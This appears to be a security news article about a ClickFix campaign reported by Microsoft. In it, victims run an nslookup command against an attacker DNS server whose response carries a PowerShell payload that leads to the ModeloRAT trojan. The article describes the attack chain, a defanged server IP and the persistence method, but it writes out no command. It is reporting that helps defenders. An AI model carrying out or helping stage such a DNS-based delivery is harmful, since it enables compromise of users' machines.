Threat actors are abusing DNS queries to deliver malware as part of the ClickFix social engineering technique by, Microsoft warns.
ClickFix attacks typically trick users into manually executing malicious commands to ostensibly resolve errors, install updates, or enable software functionality. Victims are usually instructed to copy and run commands that ultimately download malware from attacker-controlled servers.
However, researchers at Microsoft Threat Intelligence have observed a novel variation that replaces traditional HTTP-based payload delivery with DNS lookups.
In the observed campaign, victims are instructed to open the Windows Run dialog and execute an nslookup command that queries an attacker-controlled DNS server rather than the system’s default resolver. The command requests the hostname “example.com” from a malicious DNS server at 84[.]21.189[.]20.
Instead of returning a normal DNS response, the server responds with a crafted “NAME:” field containing a malicious PowerShell script. The command then parses and executes that script via cmd.exe, effectively delivering the second-stage payload directly through DNS traffic.
“Microsoft Defender researchers observed attackers using yet another evasion approach to the ClickFix technique: Asking targets to run a command that executes a custom DNS lookup and parses the `Name:` response to receive the next-stage payload for execution.,” Microsoft Threat Intelligence said in a post on X.
Although it’s not clear what lure the attackers used to convince victims to run the command, researchers say the DNS-delivered PowerShell script downloads additional malware from attacker infrastructure. The follow-on payload arrives as a ZIP archive containing a Python runtime executable and malicious scripts designed to perform reconnaissance on the compromised system and its domain environment.
The attack establishes persistence by creating a VBScript file in the %APPDATA%WPy64-31401python directory and placing a shortcut in the Windows Startup folder to ensure execution upon login.
The final payload is ModeloRAT, a remote access trojan that allows attackers to remotely control infected machines.